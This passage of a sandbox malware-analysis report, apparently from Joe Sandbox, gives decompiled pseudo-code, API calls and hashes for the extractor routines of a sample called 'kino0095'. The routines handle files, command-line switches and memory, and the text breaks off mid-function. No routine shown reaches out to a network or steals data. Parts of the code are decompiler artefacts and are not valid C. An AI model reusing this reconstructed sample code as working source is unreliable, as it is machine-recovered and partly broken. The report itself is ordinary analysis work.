Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: AttributesFileItemText
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
API String ID: 3625706803-3647970563
Opcode ID: 8b840bedaa93c9c382f5bd54a7c79991fecb850becfc0a25cd6ef856720cfac0
Instruction ID: 9d039ee0d75f2a81060d12785b8d65b745a01ebd723404cf88867967ff6444bc
Opcode Fuzzy Hash: 8b840bedaa93c9c382f5bd54a7c79991fecb850becfc0a25cd6ef856720cfac0
Instruction Fuzzy Hash: B64154B62022019BCB279F38DD747B573A9EB45300F054669EA869B6C3DB31DF4AC790

Uniqueness

Uniqueness Score: -1.00%

Function 00304C37 Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00304C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x308d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x308d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}

0x00304c40
0x00304c4a
0x00304c8d
0x00000000
0x00304c70
0x00304c70
0x00304c7e
0x00304c86
0x00000000
0x00000000
0x00000000
0x00304c8a

APIs

DosDateTimeToFileTime.KERNEL32 ref: 00304C54
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00304C66
SetFileTime.KERNELBASE(?,?,?,?), ref: 00304C7E

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Time$File$DateLocal
String ID:
API String ID: 2071732420-0
Opcode ID: 4d1d7a802dc7dcb6fe6ed66e68ae7de6fdeef8f353b9c0cedf9497a0a86b33b8
Instruction ID: 984ea7d9862c4dd10b8b74142806d1914ca1d43a1ab2926112bd589d9e68da6e
Opcode Fuzzy Hash: 4d1d7a802dc7dcb6fe6ed66e68ae7de6fdeef8f353b9c0cedf9497a0a86b33b8
Instruction Fuzzy Hash: E4F012B250320D7BEB16DFA5DC69DBB77ACEB04340B44452FA616C1090EA30DA14D761

Uniqueness

Uniqueness Score: -1.00%

Function 0030487A Relevance: 3.1, APIs: 2, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0030487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E0030490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}

0x00304880
0x0030488c
0x00304894
0x003048a0
0x003048c9
0x003048ce
0x003048a2
0x003048a8
0x003048b7
0x003048bc
0x003048aa
0x003048ac
0x003048ac
0x003048a8
0x003048de
0x003048e7
0x0030490b
0x003048ee
0x003048f0
0x00000000
0x00304902

APIs

CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00304A23,?,00304F67,*MEMCAB,00008000,00000180), ref: 003048DE
CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00304F67,*MEMCAB,00008000,00000180), ref: 00304902

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c66431d4c5235bac252771b622605d2bbaf9e37ee3a307c66f33501c1da16083
Instruction ID: 532dc0ec514b2e60eacfbad8f56a375d960819931d40cceb795d46f9ed665d8e
Opcode Fuzzy Hash: c66431d4c5235bac252771b622605d2bbaf9e37ee3a307c66f33501c1da16083
Instruction Fuzzy Hash: 9F018BE3E126302AF32640294C98FB7450CCB96730F1B4731BEAAE71C2D2644C0081E0

Uniqueness

Uniqueness Score: -1.00%

Function 00304AD0 Relevance: 3.0, APIs: 2, Instructions: 47
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00304AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x30858c; // 0x268
				_t9 = E00303680(_t20);
				if( *0x3091d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x308d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x309400; // 0xd9e00
							_t15 = _t14 + _t25;
							 *0x309400 = _t15;
							if( *0x308184 != 0) {
								_t21 =  *0x308584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x3093f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}

0x00304ad5
0x00304adb
0x00304ae7
0x00304aee
0x00304b05
0x00304b0d
0x00304b14
0x00304b1a
0x00304b1c
0x00304b21
0x00304b2a
0x00304b2f
0x00304b31
0x00304b39
0x00304b54
0x00304b54
0x00304b39
0x00304b2f
0x00304b0f
0x00304b0f
0x00304b0f
0x00304b5e
0x00304ae9
0x00304aed
0x00304aed

APIs

Part of subcall function 00303680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 0030369F
Part of subcall function 00303680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003036B2
Part of subcall function 00303680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003036DA

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00304B05

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: MessagePeek$FileMultipleObjectsWaitWrite
String ID:
API String ID: 1084409-0
Opcode ID: 4a9e6df3358107d5bf65ddc8f7280cd9e2cb09098bb5d9b53af056ab81510e7d
Instruction ID: 8ed11b61ca062e4e6bac0ed2f4769e607a40a01330c8fceced8f97a834b4d37b
Opcode Fuzzy Hash: 4a9e6df3358107d5bf65ddc8f7280cd9e2cb09098bb5d9b53af056ab81510e7d
Instruction Fuzzy Hash: 1201CC71202205ABDB068F29EC35BA2775CEB44725F058226FA79AB1E1CB30C912CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0030658A Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0030658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x308b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x308b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E003016B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}

0x00306592
0x00306594
0x00306596
0x00306598
0x00306598
0x0030659b
0x0030659b
0x0030659d
0x0030659e
0x003065a2
0x003065a4
0x003065a9
0x003065b2
0x003065b6
0x003065ba
0x003065c3
0x003065c5
0x003065c8
0x003065c8
0x003065c3
0x003065c9
0x003065cc
0x003065d2
0x003065d1
0x003065d1
0x00000000
0x003065dc
0x00000000

APIs

CharPrevA.USER32(00308B3E,00308B3F,00000001,00308B3E,-00000003,?,003060EC,00301140,?), ref: 003065BA

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: CharPrev
String ID:
API String ID: 122130370-0
Opcode ID: 272c897aaac5e564262e64ea271faf437af56180b56c996e7191a962ef5d93cb
Instruction ID: 3f4ab2f62dd9c6deae6bd43e59031a1fb8dd204efb88e5edb4c55e7eb41eb138
Opcode Fuzzy Hash: 272c897aaac5e564262e64ea271faf437af56180b56c996e7191a962ef5d93cb
Instruction Fuzzy Hash: 6EF04C321052509FD337491D9C94B67BFDE9B87360F29016EE8DAC338DCA658D5583B4

Uniqueness

Uniqueness Score: -1.00%

Function 0030621E Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0030621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x308004; // 0xcd371c79
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E0030597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E003044B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x309124 = E00306285();
					_t9 = 0;
				}
				return E00306CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}

0x00306229
0x00306230
0x00306247
0x0030626a
0x00306272
0x00306249
0x00306255
0x0030625f
0x00306264
0x00306264
0x00306284

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0030623F

Part of subcall function 003044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00304518
Part of subcall function 003044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00304554

Part of subcall function 00306285: GetLastError.KERNEL32(00305BBC), ref: 00306285

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: DirectoryErrorLastLoadMessageStringWindows
String ID:
API String ID: 381621628-0
Opcode ID: 31c46e802faf17909c82992381e33182669ed1c58b2e45b95d4a913778079040
Instruction ID: 058e6fca32466bf860ed897fce9f1b7a6be1014b7c172e785fd559bc645bddb1
Opcode Fuzzy Hash: 31c46e802faf17909c82992381e33182669ed1c58b2e45b95d4a913778079040
Instruction Fuzzy Hash: 5CF0E9B07062086BE751EB749D23FBF33BCDB44300F40046ABA85DA0D1DD749D548650

Uniqueness

Uniqueness Score: -1.00%

Function 00304B60 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00304B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x308d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x308d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x308d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x308d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x308d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x308d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x308d6c)) = 0;
				return 0;
			}

0x00304b66
0x00304b74
0x00304b98
0x00304ba0
0x00000000
0x00304bac
0x00304ba4
0x00000000
0x00304ba4
0x00304b78
0x00304b7e
0x00304b84
0x00304b8a
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00304FA1,00000000), ref: 00304B98

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6044ae0b86bdd2a1906a71344f405ba8ea98047c1ed19f5a63b0dcabcb200b01
Instruction ID: e8ece29bbedf0dc09d7ca9ed04cc71cc2923a5a7109b4dce160d832c841b8473
Opcode Fuzzy Hash: 6044ae0b86bdd2a1906a71344f405ba8ea98047c1ed19f5a63b0dcabcb200b01
Instruction Fuzzy Hash: 13F0F471502B089EC7639F399C30553BBE8AA953603100A2AA5EED21D0EB309566DB90

Uniqueness

Uniqueness Score: -1.00%

Function 003066AE Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E003066AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}

0x003066b1
0x003066ba
0x003066c7
0x003066bc
0x003066be
0x003066be

APIs

GetFileAttributesA.KERNELBASE(?,00304777,?,00304E38,?), ref: 003066B1

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: b3341521ac5bda9ab73533cc73df210936e10ad9fac8af96434ac00e4dca859a
Instruction ID: 21e65afa6980af2a87aca2031d899f262739cb5d5990ac149087634b7424ab37
Opcode Fuzzy Hash: b3341521ac5bda9ab73533cc73df210936e10ad9fac8af96434ac00e4dca859a
Instruction Fuzzy Hash: 7CB0927662394842AA2206317C3A55A2845A6C133ABE52B95F032C01E4CA3EC896D004

Uniqueness

Uniqueness Score: -1.00%

Function 00304CA0 Relevance: 1.3, APIs: 1, Instructions: 8
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00304CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}

0x00304caa
0x00304cb1

APIs

GlobalAlloc.KERNELBASE(00000000,?), ref: 00304CAA

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: d6c524c4eeb7c7b78626bfc9c5a86e56e2ff0845d0085e356c2b070c1127644c
Instruction ID: f14fa922386f007b2757263f2949c1df2bbb6de8c7818bc28c6dd6541e6709b9
Opcode Fuzzy Hash: d6c524c4eeb7c7b78626bfc9c5a86e56e2ff0845d0085e356c2b070c1127644c
Instruction Fuzzy Hash: 71B0123204430CB7CF011FC2FC09F853F1DE7C4761F140001F60C450508A7294108696

Uniqueness

Uniqueness Score: -1.00%

Function 00304CC0 Relevance: 1.3, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00304CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}

0x00304cc8
0x00304ccf

APIs

GlobalFree.KERNELBASE ref: 00304CC8

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 6dfdcd36fb038aaecc3dfaafd35326a80cc7a2269fd7e584f089baeff00d00cd
Instruction ID: 963373352d9171baad9ce75a79b8f7dc5d87d643f93a78fe5adce2241f1df8a3
Opcode Fuzzy Hash: 6dfdcd36fb038aaecc3dfaafd35326a80cc7a2269fd7e584f089baeff00d00cd
Instruction Fuzzy Hash: 3DB0123100020CB7CF011B42FC088453F1DD6C0360B000011F50C410218B3398118585

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00305C9E Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 422
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00305C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v12;
				CHAR* _v265;
				char _v266;
				char _v267;
				char _v268;
				CHAR* _v272;
				char _v276;
				signed int _v296;
				char _v556;
				signed int _t61;
				int _t63;
				char _t67;
				CHAR* _t69;
				signed int _t71;
				void* _t75;
				char _t79;
				void* _t83;
				void* _t85;
				void* _t87;
				intOrPtr _t88;
				void* _t100;
				intOrPtr _t101;
				CHAR* _t104;
				intOrPtr _t105;
				void* _t111;
				void* _t115;
				CHAR* _t118;
				void* _t119;
				void* _t127;
				CHAR* _t129;
				void* _t132;
				void* _t142;
				signed int _t143;
				CHAR* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t149;
				char _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				char _t167;
				char _t170;
				CHAR* _t173;
				void* _t177;
				intOrPtr* _t183;
				intOrPtr* _t192;
				CHAR* _t199;
				void* _t200;
				CHAR* _t201;
				void* _t205;
				void* _t206;
				int _t209;
				void* _t210;
				void* _t212;
				void* _t213;
				CHAR* _t218;
				intOrPtr* _t219;
				intOrPtr* _t220;
				signed int _t221;
				signed int _t223;

				_t173 = __ecx;
				_t61 =  *0x308004; // 0xcd371c79
				_v8 = _t61 ^ _t221;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t209 = 1;
				if(__ecx == 0 ||  *__ecx == 0) {
					_t63 = 1;
				} else {
					L2:
					while(_t209 != 0) {
						_t67 =  *_t173;
						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
							_t173 = CharNextA(_t173);
							continue;
						}
						_v272 = _t173;
						if(_t67 == 0) {
							break;
						} else {
							_t69 = _v272;
							_t177 = 0;
							_t213 = 0;
							_t163 = 0;
							_t202 = 1;
							do {
								if(_t213 != 0) {
									if(_t163 != 0) {
										break;
									} else {
										goto L21;
									}
								} else {
									_t69 =  *_t69;
									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
										break;
									} else {
										_t69 = _v272;
										L21:
										_t155 =  *_t69;
										if(_t155 != 0x22) {
											if(_t202 >= 0x104) {
												goto L106;
											} else {
												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
												_t177 = _t177 + 1;
												_t202 = _t202 + 1;
												_t157 = 1;
												goto L30;
											}
										} else {
											if(_v272[1] == 0x22) {
												if(_t202 >= 0x104) {
													L106:
													_t63 = 0;
													L125:
													_pop(_t210);
													_pop(_t212);
													_pop(_t162);
													return E00306CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
												} else {
													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
													_t177 = _t177 + 1;
													_t202 = _t202 + 1;
													_t157 = 2;
													goto L30;
												}
											} else {
												_t157 = 1;
												if(_t213 != 0) {
													_t163 = 1;
												} else {
													_t213 = 1;
												}
												goto L30;
											}
										}
									}
								}
								goto L131;
								L30:
								_v272 =  &(_v272[_t157]);
								_t69 = _v272;
							} while ( *_t69 != 0);
							if(_t177 >= 0x104) {
								E00306E2A(_t69, _t163, _t177, _t202, _t209, _t213);
								asm("int3");
								_push(_t221);
								_t222 = _t223;
								_t71 =  *0x308004; // 0xcd371c79
								_v296 = _t71 ^ _t223;
								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
									0x4f0 = 2;
									_t75 = E0030597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
								} else {
									E003044B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
									 *0x309124 = E00306285();
									_t75 = 0;
								}
								return E00306CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = 0;
								if(_t213 == 0) {
									if(_t163 != 0) {
										goto L34;
									} else {
										goto L40;
									}
								} else {
									if(_t163 != 0) {
										L40:
										_t79 = _v268;
										if(_t79 == 0x2f || _t79 == 0x2d) {
											_t83 = CharUpperA(_v267) - 0x3f;
											if(_t83 == 0) {
												_t202 = 0x521;
												E003044B9(0, 0x521, 0x301140, 0, 0x40, 0);
												_t85 =  *0x308588; // 0x0
												if(_t85 != 0) {
													CloseHandle(_t85);
												}
												ExitProcess(0);
											}
											_t87 = _t83 - 4;
											if(_t87 == 0) {
												if(_v266 != 0) {
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t167 = (0 | _v265 == 0x00000022) + 3;
														_t215 =  &_v268 + _t167;
														_t183 =  &_v268 + _t167;
														_t50 = _t183 + 1; // 0x1
														_t202 = _t50;
														do {
															_t88 =  *_t183;
															_t183 = _t183 + 1;
														} while (_t88 != 0);
														if(_t183 == _t202) {
															goto L49;
														} else {
															_t205 = 0x5b;
															if(E0030667F(_t215, _t205) == 0) {
																L115:
																_t206 = 0x5d;
																if(E0030667F(_t215, _t206) == 0) {
																	L117:
																	_t202 =  &_v276;
																	_v276 = _t167;
																	if(E00305C17(_t215,  &_v276) == 0) {
																		goto L49;
																	} else {
																		_t202 = 0x104;
																		E00301680(0x308c42, 0x104, _v276 + _t167 +  &_v268);
																	}
																} else {
																	_t202 = 0x5b;
																	if(E0030667F(_t215, _t202) == 0) {
																		goto L49;
																	} else {
																		goto L117;
																	}
																}
															} else {
																_t202 = 0x5d;
																if(E0030667F(_t215, _t202) == 0) {
																	goto L49;
																} else {
																	goto L115;
																}
															}
														}
													}
												} else {
													 *0x308a24 = 1;
												}
												goto L50;
											} else {
												_t100 = _t87 - 1;
												if(_t100 == 0) {
													L98:
													if(_v266 != 0x3a) {
														goto L49;
													} else {
														_t170 = (0 | _v265 == 0x00000022) + 3;
														_t217 =  &_v268 + _t170;
														_t192 =  &_v268 + _t170;
														_t38 = _t192 + 1; // 0x1
														_t202 = _t38;
														do {
															_t101 =  *_t192;
															_t192 = _t192 + 1;
														} while (_t101 != 0);
														if(_t192 == _t202) {
															goto L49;
														} else {
															_t202 =  &_v276;
															_v276 = _t170;
															if(E00305C17(_t217,  &_v276) == 0) {
																goto L49;
															} else {
																_t104 = CharUpperA(_v267);
																_t218 = 0x308b3e;
																_t105 = _v276;
																if(_t104 != 0x54) {
																	_t218 = 0x308a3a;
																}
																E00301680(_t218, 0x104, _t105 + _t170 +  &_v268);
																_t202 = 0x104;
																E0030658A(_t218, 0x104, 0x301140);
																if(E003031E0(_t218) != 0) {
																	goto L50;
																} else {
																	goto L106;
																}
															}
														}
													}
												} else {
													_t111 = _t100 - 0xa;
													if(_t111 == 0) {
														if(_v266 != 0) {
															if(_v266 != 0x3a) {
																goto L49;
															} else {
																_t199 = _v265;
																if(_t199 != 0) {
																	_t219 =  &_v265;
																	do {
																		_t219 = _t219 + 1;
																		_t115 = CharUpperA(_t199) - 0x45;
																		if(_t115 == 0) {
																			 *0x308a2c = 1;
																		} else {
																			_t200 = 2;
																			_t119 = _t115 - _t200;
																			if(_t119 == 0) {
																				 *0x308a30 = 1;
																			} else {
																				if(_t119 == 0xf) {
																					 *0x308a34 = 1;
																				} else {
																					_t209 = 0;
																				}
																			}
																		}
																		_t118 =  *_t219;
																		_t199 = _t118;
																	} while (_t118 != 0);
																}
															}
														} else {
															 *0x308a2c = 1;
														}
														goto L50;
													} else {
														_t127 = _t111 - 3;
														if(_t127 == 0) {
															if(_v266 != 0) {
																if(_v266 != 0x3a) {
																	goto L49;
																} else {
																	_t129 = CharUpperA(_v265);
																	if(_t129 == 0x31) {
																		goto L76;
																	} else {
																		if(_t129 == 0x41) {
																			goto L83;
																		} else {
																			if(_t129 == 0x55) {
																				goto L76;
																			} else {
																				goto L49;
																			}
																		}
																	}
																}
															} else {
																L76:
																_push(2);
																_pop(1);
																L83:
																 *0x308a38 = 1;
															}
															goto L50;
														} else {
															_t132 = _t127 - 1;
															if(_t132 == 0) {
																if(_v266 != 0) {
																	if(_v266 != 0x3a) {
																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
																			goto L49;
																		}
																	} else {
																		_t201 = _v265;
																		 *0x309a2c = 1;
																		if(_t201 != 0) {
																			_t220 =  &_v265;
																			do {
																				_t220 = _t220 + 1;
																				_t142 = CharUpperA(_t201) - 0x41;
																				if(_t142 == 0) {
																					_t143 = 2;
																					 *0x309a2c =  *0x309a2c | _t143;
